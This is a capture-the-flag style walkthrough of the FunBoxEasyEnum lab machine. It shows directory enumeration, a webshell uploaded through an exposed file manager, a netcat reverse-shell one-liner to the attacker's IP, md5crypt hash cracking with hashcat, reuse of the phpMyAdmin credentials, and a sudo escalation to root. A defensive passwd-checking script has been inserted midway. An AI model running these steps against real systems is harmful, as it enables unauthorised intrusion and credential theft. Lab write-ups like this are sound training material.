pg-funboxeasyenum-play

FunBoxEasyEnum

Nmap
sudo nmap 192.168.68.132 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Hitting port 80 we come to an Apache default installation page. Viewing the source of this page reveals no interesting information.

We now move on to enumerating with dirsearch.py, first running the SecLists big.txt wordlist against the target.

python3 dirsearch.py -u http://192.168.68.132/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -R 2 --full-url -t 75

We view robots.txt and find it contains:

Allow: Enum_this_Box

I ran dirsearch.py against this directory and was unable to find anything further. Viewing /phpmyadmin and attempting to log in with default credentials shows we cannot proceed with the default root account.

Running dirsearch.py against the target again, this time using the --suffix parameter to append .php to every wordlist entry, we find /mini.php.

┌──(kali㉿puckie)-[~/offsec/funboxeasyenum]
└─$ python3 /usr/share/dirsearch/dirsearch.py -u http://192.168.109.132/ -w /usr/share/dirb/wordlists/big.txt --full-url -t 75 --suffix=.php

_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | Suffixes: .php | HTTP method: GET | Threads: 75
Wordlist size: 20468

Output File: /home/kali/.dirsearch/reports/192.168.109.132/_21-08-27_08-32-48.txt

Error Log: /home/kali/.dirsearch/logs/errors-21-08-27_08-32-48.log

Target: http://192.168.109.132/

[08:32:48] Starting: 
[08:32:49] 403 - 280B - http://192.168.109.132/.htpasswd.php
[08:32:53] 403 - 280B - http://192.168.109.132/.htaccess.php
[08:33:32] 200 - 4KB - http://192.168.109.132/mini.php

Task Completed

Browsing to /mini.php we come to Zerion Mini Shell 1.0, which I used to upload a webshell as webshell.php.

Knowing that the above files exist in the root directory I then browsed to /webshell.php and was able to execute commands confirming we are running as www-data.

Running which nc shows netcat is installed on the target machine. I set up a netcat listener on my own machine, then ran the following command through the webshell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.68 80 >/tmp/f

Resulting in a reverse shell.

Upgrade the shell:

/usr/bin/script -qc /bin/bash /dev/null

Checking /etc/passwd shows the user ‘oracle’ has a password hash in the file.

oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash
lissy:x:1005:1005::/home/lissy:/bin/sh
$
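A defender's counterpart to this finding, added here as an example and not part of the original write-up: a small Python check that parses /etc/passwd records and flags any account whose password field still carries a hash (or is empty) instead of the shadow marker, rating md5crypt ($1$) and legacy DES as weak. The sample input is constructed from the two lines quoted above plus two typical shadowed entries.

```python
# Constructed sample: the two /etc/passwd lines quoted in the write-up plus
# two ordinary shadowed entries (root and a service account).
SAMPLE_PASSWD = r"""root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash
lissy:x:1005:1005::/home/lissy:/bin/sh
"""

# crypt(3) hash prefixes; only the first one is considered weak here.
HASH_TYPES = {
    "$1$": "md5crypt (weak, fast to brute-force)",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
    "$2b$": "bcrypt",
    "$2y$": "bcrypt",
}
WEAK_PREFIXES = ("$1$",)


def classify(pw):
    """Return (description, is_weak) for a passwd password field, or None
    when the field is the normal 'x' shadow marker or a lock token."""
    if pw == "x" or pw == "*" or pw.startswith("!"):
        return None
    if pw == "":
        return ("empty (no password required)", True)
    for prefix, name in HASH_TYPES.items():
        if pw.startswith(prefix):
            return (name, prefix in WEAK_PREFIXES)
    # No "$id$" prefix: traditional 13-character DES crypt or something odd.
    return ("unknown/traditional DES", True)


def find_unshadowed(passwd_text):
    """Return [(user, description, is_weak)] for every well-formed passwd
    record whose password field should have been in /etc/shadow."""
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or not fields[0]:
            continue  # not a valid 7-field passwd record
        result = classify(fields[1])
        if result is not None:
            findings.append((fields[0], result[0], result[1]))
    return findings


if __name__ == "__main__":
    for user, desc, weak in find_unshadowed(SAMPLE_PASSWD):
        print(f"{user}: {desc}{' [WEAK]' if weak else ''}")
```

Run against a real host by replacing SAMPLE_PASSWD with the contents of /etc/passwd; any hit means the hash is world-readable and the account should be moved to the shadow file and, if weak, re-hashed.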

I then took the hash and ran it in mode 500 (md5crypt) with Hashcat on my Windows host, which cracked the password as: hiphop

PS E:\PENTEST\hashcat-4.2.1> .\hashcat32.exe -m500 .\linuxhash.TXT E:\PENTEST\thc-hydra\rockyou.txt --force
hashcat (v4.2.1) starting...

OpenCL Platform #1: Intel(R) Corporation
========================================
* Device #1: Intel(R) HD Graphics 610, 819/1638 MB allocatable, 12MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Dictionary cache built:
* Filename..: E:\PENTEST\thc-hydra\rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 9 secs

$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:hiphop

Session..........: hashcat
Status...........: Cracked
Hash.Type........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target......: $1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0

I then used su to switch to the user ‘oracle’, and the switch was successful.

After poking about as the oracle user for a bit I could not find anything interesting. I tried the hiphop password against the other users with no luck. I decided to move back to www-data so I could read some files in /etc/phpmyadmin.

I disconnected the shell and re-ran the reverse shell command through the webshell to reconnect as www-data. Moving into /etc/phpmyadmin and reading the config-db.php file, we see credential information.

We find the credentials phpmyadmin:tgbzhnujm! I then logged into MySQL and was unable to find anything interesting in the databases it contained.

From here I started trying the passwords against the users in the /home/ directory until I got a match on the user ‘karla’.

Knowing this worked, I exited the shell and logged in over SSH with the same credentials so we have all the advantages of a proper SSH shell.

$ su karla
su: must be run from a terminal
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@funbox7:/$ su karla
su karla
Password: tgbzhnujm!

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

karla@funbox7:/$ sudo -l
sudo -l
[sudo] password for karla: tgbzhnujm!

Matching Defaults entries for karla on funbox7:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User karla may run the following commands on funbox7:
(ALL : ALL) ALL
karla@funbox7:/$ sudo /bin/bash -p
sudo /bin/bash -p
root@funbox7:/#
